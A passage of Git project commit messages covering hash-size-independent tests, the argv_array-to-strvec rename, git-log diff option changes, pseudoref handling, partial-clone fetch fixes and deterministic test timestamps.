between SHA-1 and SHA-256, since each contains a hex representation of
the tree's object ID. Since these are root commits, compute the size of
each commit by using a constant plus the size of a single hex object ID.
In addition, use $ZERO_OID instead of a hard-coded object ID.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Instead of using a hard-coded all-zeros object ID, use $ZERO_OID.
Compute the length of the object IDs in use and use this instead of
hard-coding the constant 40.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Adjust the test so that it computes variables for object IDs instead of
using hard-coded hashes. In addition, use cut to filter out the object
IDs and verify only the information that we're really interested in.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Allow lines which start with either a 40- or 64-character hex object ID,
to allow for both SHA-1 and SHA-256.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
One assertion in this test invokes git with core.abbrev set to "40".
Since we're expecting the full hash length, use test_oid to look up the
full hash length for the hash in use.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Use the ZERO_OID variable to abbreviate the all-zeros object ID for
maintainability and to avoid depending on a specific size for the hash.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Adjust the test to sanitize the diffs and strip out object IDs from
them, as it does for other object IDs, since we are not interested in
the particular values used.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Instead of using cut with hard-coded hash sizes, use cut with fields, or
where that's not possible, sed with $OID_REGEX, so that the tests are
independent of hash size.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This test contains hard-coded invalid object IDs. Make it hash size
independent by generating invalid object IDs using the translation
tables. Add a setup target to ensure the output of test_oid_init is
checked properly.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In this test, we want to produce several blobs whose first two hex
characters are "17", since we look at this object directory as a proxy
for how many loose objects there are before we need to GC. Use
test_oid_cache to specify strings that will hash to the right values
when turned into blobs.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Instead of hard-coding a fixed length example object ID in the test,
compute one using the translation tables. Move a variable into the
setup block so that we can ensure the exit status of test_oid is
checked.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The idea of the magic value "ac4f2ee" in this test is to make the
reworded commit `collide2` have the same shortened ID as the commit
`collide3`.
To port the same idea to the SHA-256 version of Git, we therefore need
another magic value that causes the same collision, but this time with
the SHA-256 version of the commit IDs.
In this patch, we add code guarded by `GIT_TEST_FIND_COLLIDER` to do
exactly that. Essentially, a large number of integers is appended to the
commit message "collide2" to find such a collision. To make it easier to
find such a collision, we reduce the number of digits to 4.
As the tests are no longer dependent on SHA-1, we also rename their
titles to talk about "commit IDs" instead of "SHA-1s".
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When computing the fanout length, let's use test_oid to look up the
hexadecimal size of the hash in question instead of hard-coding a value.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The bloom filter code relies on reading object IDs using parse_oid_hex.
In order to make that work with an appropriate size, we need to have
initialized the repository's hash algorithm. Since the values we're
processing depend on the repository in use, let's set up the repository
when we run the test helper.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The merge tools vimdiff2, vimdiff3, gvimdiff2, gvimdiff3 and bc3 are all
variants of the main tools vimdiff and bc. They are implemented in the
main and a one-liner script that just sources it exist for each.
Allow variants ending in [0-9] to be correctly wired without the need
for such one-liners, so instead of 5 scripts, only 1 (gvimdiff) is
needed.
Signed-off-by: pudinha <rogi@skylittlesystem.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It can be surprising that git-log doesn't show any diff for merge
commits by default. Arguably "--cc" would be a reasonable default, but
it's very expensive (which is why we turn it on for "git show" but not
for "git log"). Let's at least document the current behavior, including
the recent "--first-parent implies -m" case
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The "-t" option is infrequently used; it doesn't deserve a spot near the
top of the options list. Let's push it down into the diff-options
include, near the definition of --raw.
We'll protect it with a git-log ifdef, since it doesn't make any sense
for non-tree diff commands. Note that this means it also shows up in
git-show, but that's a good thing; it applies equally well there.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This has been the default since 170c04383b (Porcelain level "log" family
should recurse when diffing., 2007-08-27). There's not even a way to
turn it off, so you'd never even want "-r" to override that.
It's not the default for plumbing like diff-tree, of course, but the
option is documented separately there.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Our rev-list-options.txt include has a "Diff Formatting" section, but it
is ifndef'd out for all manpages except git-log. And a few bits of the
text are rather out of date.
We say "some of these options are specific to git-rev-list". That's
obviously silly since we (even before this patch) show the content only
for git-log. But moreover, it's not true; each of the listed options is
meaningful for other diff commands.
We also say "...however other diff options may be given. See git-diff-files
for more options." But there's no need to do so; git-log already has a
"Common Diff Options" section which includes diff-options.txt.
So let's move these options over to git-log and put them with the other
diff options, giving a single "diff" section for the git-log
documentation. We'll call it "Diff Formatting" but use the all-caps
top-level header to match its sibling sections. And we'll rewrite the
section intro to remove the useless bits and give a more generic
overview of the section which can be later extended.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When using "--first-parent" to consider history as a single line of
commits, git-log still defaults to treating merges specially, even
though they could be considered as single commits in the linearized
history (that just introduce all of the changes from the second and
higher parents).
Let's instead have "--first-parent" imply "-m", which makes something
like:
git log --first-parent -p
do what you'd expect. Likewise:
git log --first-parent -Sfoo
will find "foo" in merge commits.
No new test is needed; we'll tweak the output of the existing
"--first-parent -p" test, which now matches the "-m --first-parent -p"
test. The unchanged existing test for "--no-diff-merges" confirms that
the user can get the old behavior if they want.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The "-m" option sets revs->ignore_merges to "0", but there's no way to
undo it. This probably isn't something anybody overly cares about, since
"1" is already the default, but it will serve as an escape hatch when we
flip the default for ignore_merges to "0" in more situations.
We'll also add a few extra niceties:
- initialize the value to "-1" to indicate "not set", and then resolve
it to the normal 0/1 bool in setup_revisions(). This lets any tweak
functions, as well as setup_revisions() itself, avoid clobbering the
user's preference (which until now they couldn't actually express).
- since we now have --no-diff-merges, let's add the matching
--diff-merges, which is just a synonym for "-m". Then we don't even
need to document --no-diff-merges separately; it countermands the
long form of "-m" in the usual way.
The new test shows that this behaves just the same as the current
behavior without "-m".
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This was added by 82dee4160c (log: show merge commit when --cc is given,
2015-08-20), which explains why we need it. But that commit failed to
notice that setup_revisions() already does the same thing, since
cd2bdc5309 (Common option parsing for "git log --diff" and friends,
2006-04-14).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This commit fixes a couple of minor spelling mistakes inside
comments.
Signed-off-by: Steve Kemp <steve@steve.org.uk>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Fix typos introduced in commit a133737b80 ("doc: include --guide option
description for "git help"", 2013-04-02).
Signed-off-by: Andrei Rybak <rybak.a.v@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
parse_object_or_die() is passed an object ID and a name to show if the
object cannot be parsed. If the name is NULL then it shows the
hexadecimal object ID. Use that feature instead of preparing and
passing the hexadecimal representation to the function proactively.
That's shorter and a bit more efficient.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There are no callers which need it anymore. Any topics in flight will
need to be updated as they get merged in (but the compiler will make
that quite clear).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There were a few mentions of argv_array in a non-code file which didn't
get picked up in the previous commits (note that even comments in code
files were already covered because of the mechanical conversion via
perl).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Code which split an argv_array call across multiple lines, like:
argv_array_pushl(&args, "one argument",
"another argument", "and more",
NULL);
was recently mechanically renamed to use strvec, which results in
mis-matched indentation like:
strvec_pushl(&args, "one argument",
"another argument", "and more",
NULL);
Let's fix these up to align the arguments with the opening paren. I did
this manually by sifting through the results of:
git jump grep 'strvec_.*,$'
and liberally applying my editor's auto-format. Most of the changes are
of the form shown above, though I also normalized a few that had
originally used a single-tab indentation (rather than our usual style of
aligning with the open paren). I also rewrapped a couple of obvious
cases (e.g., where previously too-long lines became short enough to fit
on one), but I wasn't aggressive about it. In cases broken to three or
more lines, the grouping of arguments is sometimes meaningful, and it
wasn't worth my time or reviewer time to ponder each case individually.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We eventually want to drop the argv_array name and just use strvec
consistently. There's no particular reason we have to do it all at once,
or care about interactions between converted and unconverted bits.
Because of our preprocessor compat layer, the names are interchangeable
to the compiler (so even a definition and declaration using different
names is OK).
This patch converts all of the remaining files, as the resulting diff is
reasonably sized.
The conversion was done purely mechanically with:
git ls-files '*.c' '*.h' |
xargs perl -i -pe '
s/ARGV_ARRAY/STRVEC/g;
s/argv_array/strvec/g;
'
We'll deal with any indentation/style fallouts separately.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We eventually want to drop the argv_array name and just use strvec
consistently. There's no particular reason we have to do it all at once,
or care about interactions between converted and unconverted bits.
Because of our preprocessor compat layer, the names are interchangeable
to the compiler (so even a definition and declaration using different
names is OK).
This patch converts remaining files from the first half of the alphabet,
to keep the diff to a manageable size.
The conversion was done purely mechanically with:
git ls-files '*.c' '*.h' |
xargs perl -i -pe '
s/ARGV_ARRAY/STRVEC/g;
s/argv_array/strvec/g;
'
and then selectively staging files with "git add '[abcdefghjkl]*'".
We'll deal with any indentation/style fallouts separately.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We eventually want to drop the argv_array name and just use strvec
consistently. There's no particular reason we have to do it all at once,
or care about interactions between converted and unconverted bits.
Because of our preprocessor compat layer, the names are interchangeable
to the compiler (so even a definition and declaration using different
names is OK).
This patch converts all of the files in builtin/ to keep the diff to a
manageable size.
The conversion was done purely mechanically with:
git ls-files '*.c' '*.h' |
xargs perl -i -pe '
s/ARGV_ARRAY/STRVEC/g;
s/argv_array/strvec/g;
'
and then selectively staging files with "git add builtin/". We'll deal
with any indentation/style fallouts separately.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We want to eventually drop the use of the "argv_array" name in favor of
"strvec." Unlike most other uses of the name, this one is embedded in a
function name, so the definition and all of the callers need to be
updated at the same time.
We don't technically need to update the parameter types here (our
preprocessor compat macros make the two names interchangeable), but
let's do so to keep the site consistent for now.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This requires updating #include lines across the code-base, but that's
all fairly mechanical, and was done with:
git ls-files '*.c' '*.h' |
xargs perl -i -pe 's/argv-array.h/strvec.h/'
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The name "argv-array" isn't very good, because it describes what the
data type can be used for (program argument arrays), not what it
actually is (a dynamically-growing string array that maintains a
NULL-terminator invariant). This leads to people being hesitant to use
it for other cases where it would actually be a good fit. The existing
name is also clunky to use. It's overly long, and the name often leads
to saying things like "argv.argv" (i.e., the field names overlap with
variable names, since they're describing the use, not the type). Let's
give it a more neutral name.
I settled on "strvec" because "vector" is the name for a dynamic array
type in many programming languages. "strarray" would work, too, but it's
longer and a bit more awkward to say (and don't we all say these things
in our mind as we type them?).
A more extreme direction would be a generic data structure which stores
a NULL-terminated of _any_ type. That would be easy to do with void
pointers, but we'd lose some type safety for the existing cases. Plus it
raises questions about memory allocation and ownership. So I limited
myself here to changing names only, and not semantics. If we do find a
use for that more generic data type, we could perhaps implement it at a
lower level and then provide type-safe wrappers around it for strings.
But that can come later.
This patch does the minimum to convert the struct and function names in
the header and implementation, leaving a few things for follow-on
patches:
- files retain their original names for now
- struct field names are retained for now
- there's a preprocessor compat layer that lets most users remain the
same for now. The exception is headers which made a manual forward
declaration of the struct. I've converted them (and their dependent
function declarations) here.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
On most 64-bit platforms, "int" is significantly smaller than a size_t,
which could lead to integer overflow and under-allocation of the array.
It's probably impossible to trigger in practice, as it would imply on
the order of 2^32 individual allocations. Even if was possible to grow
an array in that way (and we typically only use it for sets of strings,
like command line options), each allocation needs a pointer, malloc
overhead, etc. You'd quite likely run out of RAM before succeeding in
such an overflow.
But all that hand-waving aside, it's easy enough to use the correct
type, so let's do so.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This is consistent with the definition of REF_TYPE_PSEUDOREF
(uppercase in the root ref namespace).
Signed-off-by: Han-Wen Nienhuys <hanwen@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The previous behavior was introduced in commit 74ec19d4be
("pseudorefs: create and use pseudoref update and delete functions",
Jul 31, 2015), with the justification "alternate ref backends still
need to store pseudorefs in GIT_DIR".
Refs such as REBASE_HEAD are read through the ref backend. This can
only work consistently if they are written through the ref backend as
well. Tooling that works directly on files under .git should be
updated to use git commands to read refs instead.
The following behaviors change:
* Updates to pseudorefs (eg. ORIG_HEAD) with
core.logAllRefUpdates=always will create reflogs for the pseudoref.
* non-HEAD pseudoref symrefs are also dereferenced on deletion. Update
t1405 accordingly.
Signed-off-by: Han-Wen Nienhuys <hanwen@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
I've seen several people mis-configure git send-email on their first
attempt because they set the sendmail.* config options - not
sendemail.*. This patch detects this mistake and bails out with a
friendly warning.
Signed-off-by: Drew DeVault <sir@cmpwn.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In our test suite, when 'git p4' invokes a Git command as a
subprocesses, then it should run the 'git' binary we are testing.
Unfortunately, this is not the case in the 'linux-clang' and
'linux-gcc' jobs on Travis CI, where 'git p4' runs the system
'/usr/bin/git' instead.
Travis CI's default Linux image includes 'pyenv', and all Python
invocations that involve PATH lookup go through 'pyenv', e.g. our
'PYTHON_PATH=$(which python3)' sets '/opt/pyenv/shims/python3' as
PYTHON_PATH, which in turn will invoke '/usr/bin/python3'. Alas, the
'pyenv' version included in this image is buggy, and prepends the
directory containing the Python binary to PATH even if that is a
system directory already in PATH near the end. Consequently, 'git p4'
in those jobs ends up with its PATH starting with '/usr/bin', and then
runs '/usr/bin/git'.
So use the absolute paths '/usr/bin/python{2,3}' explicitly when
setting PYTHON_PATH in those Linux jobs to avoid the PATH lookup and
thus the bogus 'pyenv' from interfering with our 'git p4' tests.
Don't bother with special-casing Travis CI: while this issue doesn't
affect the corresponding Linux jobs on GitHub Actions, both CI systems
use Ubuntu LTS-based images, so we can safely rely on these Python
paths.
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The index-pack documentation explicitly states that the pack
name is derived from the sorted list of object names, but
since commit 1190a1acf8 ("pack-objects: name pack files
after trailer hash") that isn't true anymore.
Be less explicit in the docs as to what the exact output is,
and just say that it's whatever goes into the pack name.
Also update a comment on write_idx_file() since it no longer
modifies the sha1 variable (it's const now anyway), as noted
by Junio.
Fixes: 1190a1acf8 ("pack-objects: name pack files after trailer hash")
Signed-off-by: Johannes Berg <johannes@sipsolutions.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When pretend_object_file() is invoked with an object that does not exist
(as is the typical case), there is no need to fetch anything from the
promisor remote, because the caller already knows what the object is
supposed to contain. Therefore, suppress the fetch. (The
OBJECT_INFO_QUICK flag is added for the same reason.)
This was noticed at $DAYJOB when "blame" was run on a file that had
uncommitted modifications.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When an object to be packed is noticed to be missing, prefetch all
to-be-packed objects in one batch.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Use oid_object_info_extended() instead of oid_object_info() because a
subsequent commit needs to specify an additional flag here.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When we invoke a remote transport helper and pass an option with an
argument, we quote the argument as a C-style string if necessary. This
is the case for the cas option, which implements the --force-with-lease
command-line flag, when we're passing a non-ASCII refname.
However, the remote curl helper isn't designed to parse such an
argument, meaning that if we try to use --force-with-lease with an HTTP
push and a non-ASCII refname, we get an error like this:
error: cannot parse expected object name '0000000000000000000000000000000000000000"'
Note the double quote, which get_oid has reminded us is not valid in an
hex object ID.
Even if we had been able to parse it, we would send the wrong data to
the server: we'd send an escaped ref, which would not behave as the user
wanted and might accidentally result in updating or deleting a ref we
hadn't intended.
Since we need to expect a quoted C-style string here, just check if the
first argument is a double quote, and if so, unquote it. Note that if
the refname contains a double quote, then we will have double-quoted it
already, so there is no ambiguity.
We test for this case only in the smart protocol, since the DAV-based
protocol is not capable of handling this capability. We use UTF-8
because this is nicer in our tests and friendlier to Windows, but the
code should work for all non-ASCII refs.
While we're at it, since the name of the option is now well established
and isn't going to change, let's inline it instead of using the #define
constant.
Reported-by: Frej Bjon <frej.bjon@nemit.fi>
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
'git mv' has always complained about renaming a conflicted
file, as it cannot handle multiple index entries for one file.
However, the error message it uses has been the same as the
one for an untracked file:
fatal: not under version control, src=...
which is patently wrong. Distinguish the two cases and
add a test to make sure we produce the correct message.
Signed-off-by: Chris Torek <chris.torek@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 95c11ecc73 ("Fix error-prone fill_directory() API; make it only
return matches", 2020-04-01), we taught `fill_directory()`, or more
specifically `treat_path()`, to check against any pathspecs so that we
could simplify the callers.
But in doing so, we added a slightly-too-early return for the "excluded"
case. We end up not checking the pathspecs, meaning we return
`path_excluded` when maybe we should return `path_none`. As a result,
`git status --ignored -- pathspec` might show paths that don't actually
match "pathspec".
Move the "excluded" check down to after we've checked any pathspecs.
Reported-by: Andreas Schwab <schwab@linux-m68k.org>
Reviewed-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This will allow these tests to run with alternative ref backends
Signed-off-by: Han-Wen Nienhuys <hanwen@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When upload-pack receives a request containing "have" hashes, it (among
other things) checks if the served repository has the corresponding
objects. However, it does not do so with the
OBJECT_INFO_SKIP_FETCH_OBJECT flag, so if serving a partial clone, a
lazy fetch will be triggered first.
This was discovered at $DAYJOB when a user fetched from a partial clone
(into another partial clone - although this would also happen if the
repo to be fetched into is not a partial clone).
Therefore, whenever "have" hashes are checked for existence, pass the
OBJECT_INFO_SKIP_FETCH_OBJECT flag. Also add the OBJECT_INFO_QUICK flag
to improve performance, as it is typical that such objects do not exist
in the serving repo, and the consequences of a false negative are minor
(usually, a slightly larger pack sent).
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It's useful and efficient to be able to get the size of the
contents directly without having to pipe through `wc -c`.
Also the result of the following:
`git for-each-ref --format='%(contents)' refs/heads/my-branch | wc -c`
is off by one as `git for-each-ref` appends a newline character
after the contents, which can be seen by comparing its output
with the output from `git cat-file`.
As with %(contents), %(contents:size) is silently ignored, if a
ref points to something other than a commit or a tag:
```
$ git update-ref refs/mytrees/first HEAD^{tree}
$ git for-each-ref --format='%(contents)' refs/mytrees/first
$ git for-each-ref --format='%(contents:size)' refs/mytrees/first
```
Signed-off-by: Christian Couder <chriscool@tuxfamily.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
has_dir_name() has some optimizations for the case where entries are
added to an index in the correct order. They kick in if the new entry
sorts after the last one. One of them exits early if the last entry has
a longer name than the directory of the new entry. Here's its comment:
/*
* The directory prefix lines up with part of
* a longer file or directory name, but sorts
* after it, so this sub-directory cannot
* collide with a file.
*
* last: xxx/yy-file (because '-' sorts before '/')
* this: xxx/yy/abc
*/
However, a file named xxx/yy would be sorted before xxx/yy-file because
'-' sorts after NUL, so the length check against the last entry is not
sufficient to rule out a collision. Remove it.
Reported-by: SZEDER Gábor <szeder.dev@gmail.com>
Suggested-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We made the mistake in the past of respecting extensions.* even when the
repository format version was set to 0. This is bad because forgetting
to bump the repository version means that older versions of Git (which
do not know about our extensions) won't complain. I.e., it's not a
problem in itself, but it means your repository is in a state which does
not give you the protection you think you're getting from older
versions.
For compatibility reasons, we are stuck with that decision for existing
extensions. However, we'd prefer not to extend the damage further. We
can do that by catching any newly-added extensions and complaining about
the repository format.
Note that this is a pretty heavy hammer: we'll refuse to work with the
repository at all. A lesser option would be to ignore (possibly with a
warning) any new extensions. But because of the way the extensions are
handled, that puts the burden on each new extension that is added to
remember to "undo" itself (because they are handled before we know
for sure whether we are in a v1 repo or not, since we don't insist on a
particular ordering of config entries).
So one option would be to rewrite that handling to record any new
extensions (and their values) during the config parse, and then only
after proceed to handle new ones only if we're in a v1 repository. But
I'm not sure if it's worth the trouble:
- ignoring extensions is likely to end up with broken results anyway
(e.g., ignoring a proposed objectformat extension means parsing any
object data is likely to encounter errors)
- this is a sign that whatever tool wrote the extension field is
broken. We may be better off notifying immediately and forcefully so
that such tools don't even appear to work accidentally.
The only downside is that fixing the situation is a little tricky,
because programs like "git config" won't want to work with the
repository. But:
git config --file=.git/config core.repositoryformatversion 1
should still suffice.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The completion for diff command was added in fd0bc17557 but
missed the show command which also supports --color-moved[-ws].
This suffers from the very same problem [1] as the referenced
commit: no comma-separated list completion for --color-moved-ws.
[1]: https://github.com/scop/bash-completion/issues/240
Signed-off-by: Michal Privoznik <mprivozn@redhat.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
An earlier "fix" to this script gave up updating it not to rely on
the current time because we cannot control what timestamp subversion
gives its commits. We however could solve the issue in a different
way and still use deterministic timestamps on Git commits.
One fix would be to sort the list of trees before removing duplicates,
but that loses information:
- we do care that the fetched history is in the same order
- there's a tree which appears twice in the history, and we'd want to
make sure that it's there both times
So instead, let's de-duplicate using a hash (preserving the order), and
drop only lines with identical trees and subjects (preserving the tree
which appears twice, since it has different subjects each time).
Signed-off-by: Jeff King <peff@peff.net>
Acked-by: Eric Wong <e@80x24.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We always set the name and email for committer and author idents to make
the test suite more deterministic, but not timestamps. Many scripts use
test_tick to get consistent and sensibly incrementing timestamps as they
create commits. But other scripts don't particularly care about the
timestamp, and are happy to use whatever the current system time is.
This non-determinism can be annoying:
- when debugging a test, comparing results between two runs can be
difficult, because the commit ids change
- this can sometimes cause tests to be racy. E.g., traversal order
depends on timestamp order. Even in a well-ordered set of commands,
because our timestamp granularity is one second, two commits might
sometimes have the same timestamp and sometimes differ.
Let's set a default timestamp for all scripts to use. Any that use
test_tick already will be unaffected (because their first test_tick call
will overwrite our default), but it will make things a bit more
deterministic for those that don't.
We should be able to choose any time we want here. I picked this one
because:
- it differs from the initial test_tick default, which may make it
easier to distinguish when debugging tests. I picked "April 1st
13:14:15" in the hope that it might stand out.
- it's slightly before the test_tick default. Some tests create some
commits before the first call to test_tick, so using an older
timestamps for those makes sense chronologically. Note that this
isn't how things currently work (where system times are usually more
recent than test_tick), but that also allows us to flush out a few
hidden timestamp dependencies (like the one recently fixed in
t5539).
- we could likewise pick any timezone we want. Choosing +0000 would
have required fixing up fewer tests, but we're more likely to turn
up interesting cases by not matching $TZ exactly. And since
test_tick already checks "-0700", let's try something in the "+"
zone range for variety.
It's possible that the non-deterministic times could help flush out bugs
(e.g., if something broke when the clock flipped over to 2021, our test
suite would let us know). But historically that hasn't been the case;
all time-dependent outcomes we've seen turned out to be accidentally
flaky tests (which we fixed by using test_tick). If we do want to cover
handling the current time, we should dedicate one script to doing so,
and have it unset GIT_COMMITTER_DATE explicitly.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The early part of t9100 creates an unusual "doubled" history in the
"git-svn" ref. When we get to t9100.17, it looks like this:
$ git log --oneline --graph git-svn
[...]
* efd0303 detect node change from file to directory #2
|\
* | 3e727c0 detect node change from file to directory #2
|/
* 3b00468 try a deep --rmdir with a commit
|\
* | b4832d8 try a deep --rmdir with a commit
|/
* f0d7bd5 import for git svn
Each commit we make with "git commit" is paired with one from "git svn
set-tree", with the latter as a merge of the first and its grandparent.
Later, t9100.17 wants to check that "git svn fetch" gets the same trees.
And it does, but just one copy of each. So it uses rev-list to get the
tree of each commit and pipes it to "uniq" to drop the duplicates. Our
input isn't sorted, but it will find adjacent duplicates. This works
reliably because the order of commits from rev-list always shows the
duplicates next to each other. For any one of those merges, we could
choose to show its duplicate or the grandparent first. But barring
clocks running backwards, the duplicate will always have a time equal to
or greater than the grandparent. Even if equal, we break ties by showing
the first-parent first, so the duplicates remain adjacent.
But this would break if the timestamps stopped moving in chronological
order. Normally we would rely on test_tick for this, but we have _two_
sources of time here:
- "git commit" creates one commit based on GIT_COMMITTER_DATE (which
respects test_tick)
- the "svn set-tree" one is based on subversion, which does not have
an easy way to specify a timestamp
So using test_tick actually breaks the test, because now the duplicates
are far in the past, and we'll show the grandparent before the
duplicate. And likewise, a proposed change to set GIT_COMMITTER_DATE in
all scripts will break it.
We _could_ fix this by sorting before removing duplicates, but
presumably it's a useful part of the test to make sure the trees appear
in the same order in both spots. Likewise, we could use something like:
perl -ne 'print unless $seen{$_}++'
to remove duplicates without impacting the order. But that doesn't work
either, because there are actually multiple (non-duplicate) commits with
the same trees (we change a file mode and then change it back). So we'd
actually have to de-duplicate the combination of subject and tree. Which
then further throws off t9100.18, which compares the tree hashes
exactly; we'd have to strip the result back down.
Since this test _isn't_ buggy, the simplest thing is to just work around
the proposed change by documenting our expectation that git-created
commits are correctly interleaved using the current time.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Rebase is implemented with two different backends - 'apply' and
'merge' each of which support a different set of options. In
particular the apply backend supports a number of options implemented
by 'git am' that are not implemented in the merge backend. This means
that the available options are different depending on which backend is
used which is confusing. This patch adds support for the
--ignore-whitespace option to the merge backend. This option treats
lines with only whitespace changes as unchanged and is implemented in
the merge backend by translating it to -Xignore-space-change.
Signed-off-by: Rohit Ashiwal <rohit.ashiwal265@gmail.com>
Signed-off-by: Phillip Wood <phillip.wood@dunelm.org.uk>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Regarding reflog messages:
- We expect that a reflog message consists of a single line. The
file format used by the files backend may add a LF after the
message as a delimiter, and output by commands like "git log -g"
may complete such an incomplete line by adding a LF at the end,
but philosophically, the terminating LF is not a part of the
message.
- We however allow callers of refs API to supply a random sequence
of NUL terminated bytes. We cleanse caller-supplied message by
squashing a run of whitespaces into a SP, and by trimming trailing
whitespace, before storing the message. This is how we tolerate,
instead of erring out, a message with LF in it (be it at the end,
in the middle, or both).
Currently, the cleansing of the reflog message is done by the files
backend, before the log is written out. This is sufficient with the
current code, as that is the only backend that writes reflogs. But
new backends can be added that write reflogs, and we'd want the
resulting log message we would read out of "log -g" the same no
matter what backend is used, and moving the code to do so to the
generic layer is a way to do so.
An added benefit is that the "cleansing" function could be updated
later, independent from individual backends, to e.g. allow
multi-line log messages if we wanted to, and when that happens, it
would help a lot to ensure we covered all bases if the cleansing
function (which would be updated) is called from the generic layer.
